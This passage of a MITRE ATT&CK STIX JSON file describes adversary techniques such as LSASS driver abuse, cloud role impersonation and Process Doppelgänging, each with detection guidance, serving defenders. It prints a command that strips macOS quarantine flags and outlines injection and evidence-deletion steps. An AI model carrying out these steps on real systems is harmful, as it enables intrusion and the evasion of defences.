Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", "created": "2020-10-02T16:50:12.809Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1593/002", "external_id": "T1593.002"}, {"source_name": "SecurityTrails Google Hacking", "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.", "url": "https://securitytrails.com/blog/google-hacking-techniques"}, {"source_name": "ExploitDB GoogleHacking", "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.", "url": "https://www.exploit-db.com/google-hacking-database"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "LSASS Driver", "description": "The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vincent Le Toux"], "x_mitre_detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.\n\nUtilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6e6845c2-347a-4a6f-a2d1-b74a18ebd352", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1177", "external_id": "T1177"}, {"source_name": "Microsoft Security Subsystem", "description": "Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.", "url": "https://technet.microsoft.com/library/cc961760.aspx"}, {"source_name": "Microsoft LSA Protection Mar 2014", "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.", "url": "https://technet.microsoft.com/library/dn408187.aspx"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Microsoft DLL Security", "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Business Relationships", "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization\u2019s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim\u2019s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", "created": "2020-10-02T16:27:55.713Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1591/002", "external_id": "T1591.002"}, {"source_name": "ThreatPost Broadvoice Leak", "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-03-28T15:30:09.313Z", "name": "Temporary Elevated Cloud Access", "description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "Azure AD", "Office 365", "Google Workspace"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", "created": "2023-07-10T16:37:15.672Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548/005", "external_id": "T1548.005"}, {"source_name": "AWS PassRole", "description": "AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html"}, {"source_name": "CrowdStrike StellarParticle January 2022", "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"}, {"source_name": "Google Cloud Just in Time Access 2023", "description": "Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.", "url": "https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project"}, {"source_name": "Google Cloud Service Account Authentication Roles", "description": "Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.", "url": "https://cloud.google.com/iam/docs/service-account-permissions"}, {"source_name": "Microsoft Impersonation and EWS in Exchange", "description": "Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.", "url": "https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange"}, {"source_name": "Azure Just in Time Access 2023", "description": "Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.", "url": "https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access"}, {"source_name": "Rhino Security Labs AWS Privilege Escalation", "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation \u2013 Methods and Mitigation. Retrieved May 27, 2022.", "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/"}, {"source_name": "Rhino Google Cloud Privilege Escalation", "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform \u2013 Part 1 (IAM). Retrieved September 21, 2023.", "url": "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/"}, {"source_name": "Hunters Domain Wide Delegation Google Workspace 2023", "description": "Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.", "url": "https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover"}, {"source_name": "Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023", "description": "Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024.", "url": "https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Video Capture", "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "created": "2017-05-31T21:31:37.917Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1125", "external_id": "T1125"}, {"source_name": "objective-see 2017 review", "description": "Patrick Wardle. (n.d.). Retrieved March 20, 2018.", "url": "https://objective-see.com/blog/blog_0x25.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Gatekeeper Bypass", "description": "In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. \n\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won\u2019t set this flag. Additionally, other utilities or events like drive-by downloads don\u2019t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)\n \nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS\u2019s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Application whitelisting", "Anti-virus"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6fb6408c-0db3-41d9-a3a1-a32e5f16454e", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1144", "external_id": "T1144"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Clearing quarantine attribute", "description": "Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.", "url": "https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/"}, {"source_name": "OceanLotus for OS X", "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"}, {"source_name": "Bypassing Gatekeeper", "description": "Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Software Packing", "description": "Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.\n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.\n\nAdversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Filip Kafka, ESET"], "x_mitre_detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Signature-based detection", "Anti-virus", "Heuristic detection"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88", "created": "2017-05-31T21:30:43.472Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1045", "external_id": "T1045"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/570.html", "external_id": "CAPEC-570"}, {"source_name": "Wikipedia Exe Compression", "description": "Executable compression. (n.d.). Retrieved December 4, 2014.", "url": "http://en.wikipedia.org/wiki/Executable_compression"}, {"source_name": "ESET FinFisher Jan 2018", "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.", "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Process Doppelg\u00e4nging", "description": "Adversaries may inject malicious code into process via process doppelg\u00e4nging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelg\u00e4nging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelg\u00e4nging may evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "x_mitre_permissions_required": ["Administrator", "SYSTEM", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "created": "2020-01-14T17:19:50.978Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/013", "external_id": "T1055.013"}, {"source_name": "Microsoft TxF", "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx"}, {"source_name": "Microsoft Basic TxF Concepts", "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx"}, {"source_name": "Microsoft Where to use TxF", "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx"}, {"source_name": "BlackHat Process Doppelg\u00e4nging Dec 2017", "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelg\u00e4nging. Retrieved December 20, 2017.", "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf"}, {"source_name": "hasherezade Process Doppelg\u00e4nging Dec 2017", "description": "hasherezade. (2017, December 18). Process Doppelg\u00e4nging \u2013 a new way to impersonate a process. Retrieved December 20, 2017.", "url": "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/"}, {"source_name": "Microsoft PsSetCreateProcessNotifyRoutine routine", "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-07-28T14:40:54.580Z", "name": "System Network Configuration Discovery", "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "created": "2017-05-31T21:30:27.342Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1016", "external_id": "T1016"}, {"source_name": "Mandiant APT41 Global Intrusion ", "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.", "url": "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Delete Cloud Instance", "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)", "kill_chain_phases": 